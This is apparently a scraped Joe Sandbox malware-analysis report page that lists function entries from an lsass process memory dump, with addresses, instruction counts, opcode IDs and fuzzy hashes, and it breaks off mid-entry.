Instruction Fuzzy Hash: 2521D872D0911A4BFB25BBEDA882CFC7741DF92771F21D136D50C451AB4F293484AAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E30, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f13c616feb3fda1ba34f16f6d9938a3db7cdd24b74711c554ba14a9eeb37d3
Instruction ID: 46384ecba3507a598ad231c66eead97a22794da4453ff9f73d2ce0d07b097e78
Opcode Fuzzy Hash: 91f13c616feb3fda1ba34f16f6d9938a3db7cdd24b74711c554ba14a9eeb37d3
Instruction Fuzzy Hash: 9321D972D0911A4BFB25BBEDA882CFC7741DF53760F21D136D40C451AB4F193484AAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E38, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 219264ca5e1983dd0ea43e333f41605dbb84164ac5ec1a4926cb918678f33392
Instruction ID: ce63445c63256ab41e7721d0acc498cde56452d2be7ae460ea10581134f7ca02
Opcode Fuzzy Hash: 219264ca5e1983dd0ea43e333f41605dbb84164ac5ec1a4926cb918678f33392
Instruction Fuzzy Hash: F021D872C0911A5BFB257BEDA842CFC7B80DF53760F21E036D04C451AB4F193484AA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E40, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96ead7ff13c4d6093729a69930b0421838efed1e10c31f2fa15b3d81a70a0dc3
Instruction ID: 1866723e143d8b1da9c3bf5f241a4623a104d7655eb2c7d15af11f8e2b9fe8ca
Opcode Fuzzy Hash: 96ead7ff13c4d6093729a69930b0421838efed1e10c31f2fa15b3d81a70a0dc3
Instruction Fuzzy Hash: 5321B562C0D11A5BFA257BE9A842CF86B80DF63760F21E036D04C051A78F193584AA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36270B43, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ae96411f2b2823a035e43d683cd8ff58ab1c7702b447fa40524905e2f063b1
Instruction ID: 034063a7dfe0784b008e8009810a5434fd804c89807818830ed4d170e8066385
Opcode Fuzzy Hash: 22ae96411f2b2823a035e43d683cd8ff58ab1c7702b447fa40524905e2f063b1
Instruction Fuzzy Hash: B52130B1D0861D8EEFA4DB888854FE973B0FB55305F10A1B6D00DE3246DE35AA899F40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E48, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a54aaaff1183ec489c129c58b96082e47183459632ff7cc9ea39423670b834d
Instruction ID: e5c7dbf9b8d0b5870ffc5a14674d912972cdbad95bd6d62f56c362a28ed1046e
Opcode Fuzzy Hash: 6a54aaaff1183ec489c129c58b96082e47183459632ff7cc9ea39423670b834d
Instruction Fuzzy Hash: 46219572C0D11A5BFB6577E96843CF86B91EF23B60F21E036E04C091E74F1A3584AA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E83, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699e0a7d037f6f33deab8731037daf81220fa70c07b11ea6719af4d1e94799c8
Instruction ID: c98eaf053e03085c41908f0c3d1b86d57f44135169801aea15b545d4da97c2c5
Opcode Fuzzy Hash: 699e0a7d037f6f33deab8731037daf81220fa70c07b11ea6719af4d1e94799c8
Instruction Fuzzy Hash: A61146A2C0E55A5BFA6577E96802CFC6780DF63760F21E436E04C452D78E1A38846A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E80, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8d91ab779a707992473c13be3b7ec9fc9a3a47801ea9f21fc1153e5fa8d882
Instruction ID: 2a51d29beeb80c676eeeee26c40b79e49540d04faadfd467ac2bfa25417c63e7
Opcode Fuzzy Hash: 9d8d91ab779a707992473c13be3b7ec9fc9a3a47801ea9f21fc1153e5fa8d882
Instruction Fuzzy Hash: 031133A2C0E55A5BFA6577E92802CFC6A81DF23760F21E435E04C452E78E1A38846A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E68, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 473477ec5d0e5776dd24514b417393a97c7525e80e3d3781270106f879783a04
Instruction ID: 62ab9027475d468c520aa846b58bbc944bb804e4b51cacbb7405f5d708a6ad0e
Opcode Fuzzy Hash: 473477ec5d0e5776dd24514b417393a97c7525e80e3d3781270106f879783a04
Instruction Fuzzy Hash: 051154B1C0D51A5BFB6577E96842CF87B90EF23750F11E035E04C052E74E1E35846A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E70, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e97f4e6ef56b161df917cbb9ffa3d182093d3ab8811f5c885ecf4c03c87086
Instruction ID: f9bff839acd92a7e844543fec0f358009ac75346eaf8873854951fc530938bb7
Opcode Fuzzy Hash: 46e97f4e6ef56b161df917cbb9ffa3d182093d3ab8811f5c885ecf4c03c87086
Instruction Fuzzy Hash: 441160A2C0E51A5BFB6577E96842CF86B80EF23750F21E035E04C052D78E1A38846A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E78, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc944a83aeb0e9f6a02c67f82471f19ad93246fb228c76070e8110d7c7390a5
Instruction ID: ba9ee6f474efa645cc5fa1000978a688432bddc00bcd8e1ef7fd247b6df69435
Opcode Fuzzy Hash: fdc944a83aeb0e9f6a02c67f82471f19ad93246fb228c76070e8110d7c7390a5
Instruction Fuzzy Hash: DB1133A1C0E55B5BFA6577F92803CF86A81DF23750F22E435E04C052D74E1E38847A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626077D, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c796173f3ad1e63dc2d66401b53349b9706b20b28e9371260ebed4bdab4169b
Instruction ID: d9806f63f36db48d08ed6e270c91e4bc740cba89ed5da7d2f4b5df9980f4bbf1
Opcode Fuzzy Hash: 7c796173f3ad1e63dc2d66401b53349b9706b20b28e9371260ebed4bdab4169b
Instruction Fuzzy Hash: 83114C71C4920A8AF7519F908944AFE77B0AF22301F019536D0199A3D2DFBE6649FF91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36271F87, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56205694a6b6003455c195c579443cdd09c17d5f25d383bc2e9f628e960f355f
Instruction ID: d0cb60de4a9064aad7fc62c638235a52ace8c89da462193baabc6c637b0cd75a
Opcode Fuzzy Hash: 56205694a6b6003455c195c579443cdd09c17d5f25d383bc2e9f628e960f355f
Instruction Fuzzy Hash: 96F0D645F0D86314F32432BD2858CFD0A01CFD7A60B55A17BD88ECA3D3EC0A644A72A5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362737E3, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3038c46419eb6f8d3b5c9591922c7fd394b87f666ee8e73cfe95025c9373dbc5
Instruction ID: 712708d65bce6a3773a71144f3818745411de44e27e874f58dc04c6f1b1d5d46
Opcode Fuzzy Hash: 3038c46419eb6f8d3b5c9591922c7fd394b87f666ee8e73cfe95025c9373dbc5
Instruction Fuzzy Hash: 4A013971D0850A8BEB54EB94C855EFDB7B1FF5A310F11953AC00AE2292DE3968819B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260EC0, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9d10513e471ae1f98a62a3ecc9081e7227ee8249662b5b83c4d7f802a17945
Instruction ID: ac4e58d4ebe2de7fa47096c34e87fe20be50e70c6eea60c856d8bc701e0ffec9
Opcode Fuzzy Hash: 0a9d10513e471ae1f98a62a3ecc9081e7227ee8249662b5b83c4d7f802a17945
Instruction Fuzzy Hash: B711172144E3C14FD3539BB04C656A07FB0AF07214F0A44EBD889CB1E3DA9D1859D762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36269550, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d08436d24c6b9583df5724fe01d767474df5a3cc6c3f772715fe420adae45315
Instruction ID: 3e68f8e98cd21ad9302e371238328ec36c40bd22a563fc8f2af4a0524f48f430
Opcode Fuzzy Hash: d08436d24c6b9583df5724fe01d767474df5a3cc6c3f772715fe420adae45315
Instruction Fuzzy Hash: 9E010230D4850A8FEB98DB84D8A4AEDB7B1EF6A311F11513AD40AE2280CE766841DB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36274089, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab05dc5a2da3a06beea81376db0d128d56af54d4b30c61b19483dff52b7ec38
Instruction ID: c41c13ee30e326028d57b2731b37211a38a5089305ba1770ed50e9ed1fe60572
Opcode Fuzzy Hash: bab05dc5a2da3a06beea81376db0d128d56af54d4b30c61b19483dff52b7ec38
Instruction Fuzzy Hash: FE01B17081978C8FDB55EF6888559E93FF0FF6A301F0142A6E44CC7252DB389554CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36267DB1, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b962c4d66f79927e46da66a82f8de2ea456e09fe4972e0d4f173dea6253fd366
Instruction ID: 10e1c76d24cb6e8d2b62884f4dce09ddc9b6a0c7444e544624c821cb99ae6249
Opcode Fuzzy Hash: b962c4d66f79927e46da66a82f8de2ea456e09fe4972e0d4f173dea6253fd366
Instruction Fuzzy Hash: 90016271908A8C8FDF94DF28C889AA93FF0FF29300F0144A6E419C7261DB34D590CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268F69, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54b0c1a277d244a3cbf6426060db0fb502b4bc0df3fd17999ede50cd695f317
Instruction ID: a965c15fddc3f04f976a9d16bb24448e6362558e7c615d529542715f05a2fa6d
Opcode Fuzzy Hash: d54b0c1a277d244a3cbf6426060db0fb502b4bc0df3fd17999ede50cd695f317
Instruction Fuzzy Hash: B0014F7190868D8FDB91EF28C849AA93FF1FF2A310F4541A6E81CC7262DA78D554CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36271601, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84a8b19f5e1afffb167449e119d72b6f207939b1d029e96cd464b9ba65e104c3
Instruction ID: 0742580d98350d99d7f911888d03c14cb9494634e7c1257cb2e8581f6241051a
Opcode Fuzzy Hash: 84a8b19f5e1afffb167449e119d72b6f207939b1d029e96cd464b9ba65e104c3
Instruction Fuzzy Hash: 8401EC70D4D409CAEB64DB98C485EFCB7B5EF5A301F55A0B9D00DE3282CE3579819B45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36270350, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35aac059fe804ebdad63fb855c4fdd37a522c7e8c8fc6c5c003fbec30e380229
Instruction ID: 837e269ce548262a9a8e312984ce155aa8f30cc6a89e0c495c7df6484d5900b6
Opcode Fuzzy Hash: 35aac059fe804ebdad63fb855c4fdd37a522c7e8c8fc6c5c003fbec30e380229
Instruction Fuzzy Hash: 0F014CB1E2850E8FEB54EB94C8A59FD77B2FF55300F40813AC00ED7292DE6868059B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260E5F, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a270ff3902711de4bd03caf89c27996fd6a7186004179d67c1a1827371285c3
Instruction ID: 3b1741cb0042f413a6bac708f3882172c8a0dfbe0e71fd23171c5baa9f165991
Opcode Fuzzy Hash: 3a270ff3902711de4bd03caf89c27996fd6a7186004179d67c1a1827371285c3
Instruction Fuzzy Hash: 5401D370D1461E8FEB84EB94C958AACB7B1FF69300F41527AC40DE7296DFB86940EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260CF5, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5fcc812c9561783c61f4c404284ddf1536e6a446c4d41d0892350dfaa7f2ebb
Instruction ID: 5918d8a6858ca03f349f7a1aaa7f01aed59f784e4adc1eee7e7a543822f6f0d8
Opcode Fuzzy Hash: f5fcc812c9561783c61f4c404284ddf1536e6a446c4d41d0892350dfaa7f2ebb
Instruction Fuzzy Hash: 7A012CB0E0860A8BEB98DB84C854ABE73B1FB59300F114639C01AD3291CFB569009B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268FD1, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 457021e96abcebd2e8bc3233218d5025b118fd3b164b4f356a2a615372763fa4
Instruction ID: 0253c1161a3a9b87dfc36d191a2a8235cb7a874453a0186a5878f1753e4bfa46
Opcode Fuzzy Hash: 457021e96abcebd2e8bc3233218d5025b118fd3b164b4f356a2a615372763fa4
Instruction Fuzzy Hash: 86F06D31C1C6898FEB949FA888496A87BA0EF26300F4551BAD80CC6292DEB99550DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260D57, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4cf1e58cd7a10a48c9b5e8a06b52e007078a50298c3ea7e5b4ffa280781c53d
Instruction ID: 267080609e83cc87b36bcda22ff407dfd2671ced888747ae3e61b12926a39513
Opcode Fuzzy Hash: b4cf1e58cd7a10a48c9b5e8a06b52e007078a50298c3ea7e5b4ffa280781c53d
Instruction Fuzzy Hash: DC01A870D4860A8BEB90DF94C944AFD77B1EF26310F115635D419E2391DFB5A540AB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268F80, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37b205b7865c1e0a7cebff4447499a981a33f8d5e20ccbc307205f48b249a00c
Instruction ID: a6365528992d6edfac37be40b071a899cd6ee100244eb0d41b7ec89a74c94858
Opcode Fuzzy Hash: 37b205b7865c1e0a7cebff4447499a981a33f8d5e20ccbc307205f48b249a00c
Instruction Fuzzy Hash: A5F0173090890DCFDF80EF68C848AAA7BE1FF28300F5045A6F81CC3261CA74E5A0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268E11, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6625ce0741e302b53315d69821dac265e84e57bcb3ebd1562769de556baa4fb6
Instruction ID: 770e81cb7c664997d362d4222e11166fe097d29638e48104d3a9bc13ae8b09b1
Opcode Fuzzy Hash: 6625ce0741e302b53315d69821dac265e84e57bcb3ebd1562769de556baa4fb6
Instruction Fuzzy Hash: 06F0893180D24DCFEB65DF1488455E93FA0FF56300F418575E90C86652CB7A9564DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260680, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6fa98281abb215b0c4f11e05d6fce5f3c832014e20b576ae5ca180d45273d3
Instruction ID: bcb50c09d76ed386338e6b98cad29fe5b9eacc256f4eb07f7dc9bbfafc770c39
Opcode Fuzzy Hash: 6f6fa98281abb215b0c4f11e05d6fce5f3c832014e20b576ae5ca180d45273d3
Instruction Fuzzy Hash: 18F09061C1864E8EF7A89BA894097F87BE0AFA6314F016476D40DD2691DFB914E4E702

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272EC8, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18328fcd8175d4240ce7144c53c3344a1a0255152f92f16b4fc29bbee1576951
Instruction ID: d623c27ca651c67a675f236c2c751981db39166a1489256fda0f7ffa78dda98c
Opcode Fuzzy Hash: 18328fcd8175d4240ce7144c53c3344a1a0255152f92f16b4fc29bbee1576951
Instruction Fuzzy Hash: 66F0ECB1C0E24E8BF764ABE84802CF97B90EF13700F12A534E40C422C3DE2A7994A648

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268721, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e24403d96719c389de1c74d8de56dea813f424c1c2eca5e442633b3ca54f9360
Instruction ID: 911b377a233c6ce68a761cb78dd659a6b1682b0d7b2e1265a76651b89c36bad3
Opcode Fuzzy Hash: e24403d96719c389de1c74d8de56dea813f424c1c2eca5e442633b3ca54f9360
Instruction Fuzzy Hash: 39F0F030D1C68C8FFB91EFA888585A83BE0EF25300F004879E80CC6281DEB95150C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626FE75, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 729f64de131f4f9d72baa6995ec117adc3c8b12db2eb1e68c982496e2b4cb6a7
Instruction ID: 8f1e429fd2abf5e360d0ed3376b41391b3dadf8d0c88ef8c79ede5d7aa8037c9
Opcode Fuzzy Hash: 729f64de131f4f9d72baa6995ec117adc3c8b12db2eb1e68c982496e2b4cb6a7
Instruction Fuzzy Hash: 7BF0E232C0C6888FEB90ABA4484D6E87FE0EF16300F0184F6E50CC6282DA795144C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268350, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9d2a77ba404b47052a06de6d6d442d039d1161cdec59d0f5b7d4cc676b3a0d
Instruction ID: a86df81d2d03eb0c668166436d68fb8c1f3e096fc239a8f6870ed9c4f46771bc
Opcode Fuzzy Hash: 8b9d2a77ba404b47052a06de6d6d442d039d1161cdec59d0f5b7d4cc676b3a0d
Instruction Fuzzy Hash: 84F0A035C1820DAAFB20ABB89489AFD3BB0EF56305F109872E54DD1152CE3561949A61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626E89D, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a4206925f646a8d3c5d8289486c444f8312eeed907e616c70ae0b0f9fcbe895
Instruction ID: e7ce1b11582ac4bc096a4ec9b493c53a0098560618fe7a8e018e65a1bf55b5c6
Opcode Fuzzy Hash: 7a4206925f646a8d3c5d8289486c444f8312eeed907e616c70ae0b0f9fcbe895
Instruction Fuzzy Hash: CFF02432C0D385CFF7A1ABE4482A6E93F90AF23710F0481F6D04C872E3CE296904A742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268538, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a8a4c12f230ce1fcdbe65d20a903ac6bf4ba8f624100d6cbc96d5a25fba3fa1
Instruction ID: 9a15c15ea76c083161b2e1860d3deeb13d17e0d08efdaff47a8fcfec4e384c48
Opcode Fuzzy Hash: 9a8a4c12f230ce1fcdbe65d20a903ac6bf4ba8f624100d6cbc96d5a25fba3fa1
Instruction Fuzzy Hash: 4DF03030C1864E9FEB94EFA484496FDB7A4FF1A704F5094BAE80DD2291DE75A190CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3627386E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5431cf6cf76b98fd635e0983811148c0460070e140cadeaf57ceb6217b311f99
Instruction ID: dbc83c43b4f7510b38978f15c7b098b52349cb661a54c606c50f4928bb2313fd
Opcode Fuzzy Hash: 5431cf6cf76b98fd635e0983811148c0460070e140cadeaf57ceb6217b311f99
Instruction Fuzzy Hash: FEF0E7B1D0411B8AEB10EFD4C445EFEB6B0AF12301F11953AD019E6392DF796644EB95

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268358, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12bf1b03baad7805799a8c9548fd80a22c9891e014524c81e09bdcb575a5d986
Instruction ID: 2289f84ea55c073678350727ac4ae61258d521326be11267b834dafb66a9c696
Opcode Fuzzy Hash: 12bf1b03baad7805799a8c9548fd80a22c9891e014524c81e09bdcb575a5d986
Instruction Fuzzy Hash: 15E06D34C5850DAAFB60ABB88449AFD7BB4EF16304F509872E40DD1192DE3971949A62

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626961F, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

